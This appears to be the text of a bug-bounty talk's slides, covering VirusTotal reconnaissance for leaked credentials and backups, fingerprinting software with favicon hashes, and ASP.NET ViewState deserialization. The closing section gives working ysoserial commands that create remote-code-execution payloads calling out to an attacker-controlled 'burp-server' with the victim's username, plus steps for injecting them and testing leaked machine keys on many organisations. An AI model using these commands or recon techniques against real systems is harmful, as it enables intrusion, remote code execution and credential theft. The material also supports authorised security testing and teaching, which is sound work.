ART OF REAL

HACKING
$cat orwa
● Orwa Godfather (Orwa Atyat)

● Full Time Bug Hunter / Security

Researcher

● Bugcrowd
Security Researcher /Content Creator /
Collaborator / Top 50 BC / Top 3 P1s

● 1000+ Bug Submitted (Critical/High)

● 15+ 0days/CVEs

● Traveler / Gamer / Cooker

ART OF
Machine Keys
VirusTotal &
Zero- Day ViewState
Hacking Hacking
Deserialization
Hacking
 VirusTotal Hacking
Via VirusTotal Hacking You Can Find :

● IPs / Origin IPs

● Unique Endpoints
● Unique Sub domains / Open Ports
● Credentials
● Tokens
 What is VirusTotal
VirusTotal is a popular online service that analyzes files and URLs for potential viruses,
malware, and other threats. It aggregates results from various antivirus engines and
website scanners to give users a comprehensive report on the safety of a file or website
endpoint.

VirusTotal inspects items with over 70 antivirus scanners and URL/domain blocklisting
services, in addition to a variety of tools,

website endpoints or internal endpoints / IPs get archived on VirusTotal

Via (User submission / Automated Crawling / Analysis Reports / Etc..)

Usual
Method
Upload the File
Or
Copy the URL
Or
Search

And then start scanning

Orwa Method
Manually Extract & Private ./script For
Extract
Discovering
https://www.virustotal.com/vtapi/v2/domain/report?apikey={APIKEY}&domain={DOM
AIN}

EX
https://www.virustotal.com/vtapi/v2/domain/report?apikey=XXXX&domain=www.bmw
.com
Orwa Method
Manually
Extract
Sub Domain
https://www.virustotal.com/vtapi/v2/domain/report?apikey=XXXX&domain=www.bmw.
com
 IPs
https://www.virustotal.com/vtapi/v2/domain/report?apikey=XXXX&domain=www.bmw.c
om
 Endpoints
https://www.virustotal.com/vtapi/v2/domain/report?apikey=XXXX&domain=www.bmw.c
om
Credential
s
Scenarios Of P1/2 Bugs
Information Disclosure Endpoints ( jpg , png , pdf in financial web
apps)
Information Disclosure Endpoints (voucher codes / gift cards)
Information Disclosure Endpoints ( txt / xml / php / etc….)
Email/User:Password Endpoints (clear text or encoded)
Tokens / Api Keys / Etc.. (ATO [reset password /create account)
Unauthorized Access Endpoints
Backup Files ( .iso / .exe / .zip / .7z / .tar / .gz / .dll )
Unauthorized Access (Unique Open Ports)
Finding Origin IPs More Than Any Other Resource
Keywords Tips To Search.
CTRL+F
.zip /.7z/.exe /.tar /.gz/.dll /.iso (backup files)
token= | apikey= | /resetpassword/
registration |
Tip
== (encoded creds) | .com: | Remember. Search for
@ | code= | .aspx | .ashx | .php subdomains one by one
EX:
.jsp | .cgi | .xml | .txt | .xhtml Results of
uat-dev.orwa.com
when you search it's not the
same for
uat1-dev.orwa.com
 Orwa Method
Private ./script For Extract
https://github.com/orwagodfather/virustotalx
Critical Reports 1 PII
Critical
Reports 2 PII
Critical
Reports 3
Critical
Reports
Other Ex

app/ virustotal-endpoint/backup.7z ===> RCE P1 20K$

app/ virustotal-endpoint/actuator ===> P1 2.100$
app/ virustotal-endpoint/virustotal-param= LFI ===> P1
2100$
app/ resetpassword/virustotal-code ===> ATO 15K$
Zero-Day Hacking
 What is Zero-day
A zero-day is a vulnerability in software or hardware that is
typically unknown to the vendor and for which no patch or other
fix is available.

Here our talk about softwares ( Installed Apps Or Third-Party/3rd

Party)
Third Party Ex:
company .3rd-party.com
or

3rd-party. company .com

Ex:
bmw.okta.com
bmw.servicenow.com
bmw.jfrog.io

okta. bmw.com
servicenow. bmw.com
github. bmw.com
 To Get A Zero-day
● 1) You have to find the software / installed app / 3rd party

● 2) You have to start recon about software / installed app / 3rd

party

● 3) You have to find a bug in software / installed app / 3rd

party

● 4) You have to test the same bug on more than 2 companies

that used the software / installed app / 3rd party
Third Party:

To find on urlscan ⇒ (bmw.* -xxx(remove anything from results)

Third Party

bmw-*
Softwares/installed apps Via favicon
hash
Find the software from favicon.ico
What Are Favicons?
On most modern browsers, whenever you open a webpage, a small icon
appears on the top left corner, right before the title. That is what we call a
favicon.
Check favicon via httpx tool
─$ cat subs.txt | httpx -path /favicon.ico -mc 200 -o live-favicon.txt

Tip
In some web apps
about 30% used
other name
So manually you
have to

View source:
Search for
(.ico ) or ( favicon ) or
(icon)
How To Find The Hashes In Favicon?

There's a lot of methods but the fav for me

https://favicon-hash.kmsec.uk/

You can use a ready tool for that such as

https://github.com/devanshbatham/FavFreak
How To Find A ssets U sing Favicon
Hashes?
FIS Real Ex:
How To Find Assets Using Favicon Hashes?
FIS Real Ex:
favicon_hash=
-1884333011

md5=
a5884f3c9934cffb01a73a9ea71151
a7
How To Find Assets Using Favicon Hashes?
FIS Real Ex: (use the MD5 On Censys)
Visit: https://search.censys.io/

Dork:
services.http.response.favicons.
md5_hash:XXXXXXXXXXX
 How To Find Assets Using Favicon Hashes?
FIS Real Ex: Favicon Hash
(Shodan)

Visit:
https://www.shodan.io
/

Dork:
http.favicon.hash:XXX
 How To Find Assets Using Favicon Hashes?
FIS Real Ex: Favicon Hash
(ZoomEy)

Visit:
https://www.zoomeye.hk
/

Dork:
iconhash:"xxxxxx"
Now we know what is the software or 3rd
party
What we can do to test
● If your program software running with a strong waf we
can here start looking for the same software without
waf

● We can collect the software endpoints on other domains

not our program domain , and then test the endpoints
on our program domain

And then we can start testing ………..

What we can do to test ?
Authentication bypass via
cross-subdomain cookie reuse
&
Authentication bypass by Bypassing
Registration Restrictions

HackerX007
What we can do to test
?
● Search for backup files for the software
● Try to download and install the software
● Try to look for the software source in the
github/gitlab

And maybe you get luck by find some perfect

endpoints to test
or default credentials or Api Calls

or MachineKey in the ASP.NET

And from here let's start with a easy topic to understand about the
machine key and exploiting viewstate
deserialization…………………….
Machine Keys &
ViewState
Deserialization Hacking
Machine Keys & ViewState Deserialization
Hacking
Here in this topic i will share

● What is the Viewstate and machine key

● How to find the viewstate and machine key
● Test Cases
● Extension to find and test the viewstate
● tools/(machine keys wordlist) to test the
viewstate
● Example for Zero-Day
Machine Keys & ViewState Deserialization
Hacking
What is ViewState ?
ViewState is the method that the ASP.NET framework uses by default to preserve
page and control values between web pages. When the HTML for the page is
rendered, the current state of the page and values that need to be retained during
postback are serialized into base64-encoded strings and output in the ViewState
hidden field or fields.

What is Machine Key?

The MachineKey class provides methods that expose the hashing and
encryption logic that ASP.NET provides
MachineKey is used for:
● ViewState encryption and validation
● Forms Authentication (or Federated Authentication) uses this key for signing the
authentication ticket
In View State calls there's a machine keys to
identify the calls , if we know the machine key
for the view state we can use that to generate a
payload and get RCE and that's the
(Deserialization vulnerability )
Machine Keys & ViewState Deserialization
Hacking

How to find the ViewState ?

In any asp.net endpoint calling server such as

.asp /.aspx /.ashx /Etc….

How to find the Machine keys?

In web.config file
(download the source of software or access to web.config via LFI)
or via machine key wordlist
ViewState Ex:
ViewState Ex:
ViewState Ex:
Test Cases
(2) Cases to test the ViewState Deserialization

● if the ( Mac is not enabled ) and here we can start

exploiting directly without need to (Machine Key)

● If the ( Mac is enabled ) we have to get the (Machine key)

and in this case we can start testing the machine keys
wordlist
or
try to download the software and try access to web.config
in the source of software
Extension to find and test the viewstate
ViewState Editor Burp extension
ViewState Editor Burp extension ( Mac Enabled)
ViewState Editor Burp extension ( Mac is not enabled )
Tools/(machine keys wordlist)! To test
the viewstate.

1 AspDotNetWrapper This Tool To Test Machine Keys In View State

2 ysoserial This Tool To generate a serialized payload Tip

If the ( Mac is not
enabled ) we can skip
first tool and start
directly exploit on
ysoserial tool
Tip2
You have to test all ASPX endpoints not just a single one ,
and mostly in bypasses cases
Exploiting
(MAC is not enabled )
Simply use ysoserial generate a serialized payload and send it
in a POST request to perform RCE

EX Username Command:

ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe

Invoke-WebRequest -Uri http:// burp-server /$env:UserName "

Next Step ⇒
Copy the payload and replaces it in ViewState parameter value

&__VIEWSTATE= payload then send the request and check your burp/server
Exploiting
Exploiting (MAC enabled)

download https://github.com/orwagodfather/AspDotNetWrapper-Edited-

(if you know the machine key added to the wordlist ( MachineKeys.txt )
then run the following command

AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata <viewstate> --decrypt

--purpose=viewstate --modifier=<__VIEWSTATEGENERATOR> --macdecode

replace the <viewstate> to viewstate parameter value in the source

replace the <__VIEWSTATEGENERATOR> to __VIEWSTATEGENERATOR parameter value in

the source
Exploiting
(MAC enabled)
Keys Not Found (pass that)
If the key found the response will be like this ===>
Exploiting
(MAC enabled)
What we need form here is ( HMACSHA256 ) and the value of
(Validationkey )
Exploiting
(MAC enabled)
Next step copy the ValidationKey and HMACSHA256 and over ysoserial run this command

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c " <Command>"

--generator=<__VIEWSTATEGENERATOR> --validationalg="<Key_Type>"
--validationkey="<validationkey>"

replace the <__VIEWSTATEGENERATOR> to __VIEWSTATEGENERATOR parameter value in the source

replace the <Key_Type> to HMACSHA256
replace the <validationkey> to ValidationKey value
Exploiting
(MAC enabled)

Ex Username command

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri

http://burp-server/$env:UserName" --generator=xxxxx --validationalg="HMACSHA256" --validationkey="xxxxxxxx"

Next Step ⇒
Copy the payload and replaces it in ViewState parameter value

&__VIEWSTATE= payload then send the request and check your burp/server
Zero-Day! Example.
1) We found a software via checking for favicon hash .
2) We found a software source backup via Virustotal .
3) We found a machinkey in the source web.config
file.
4) We tested that machinkey on all clients.
And the result a amazing RCE & Zero-Day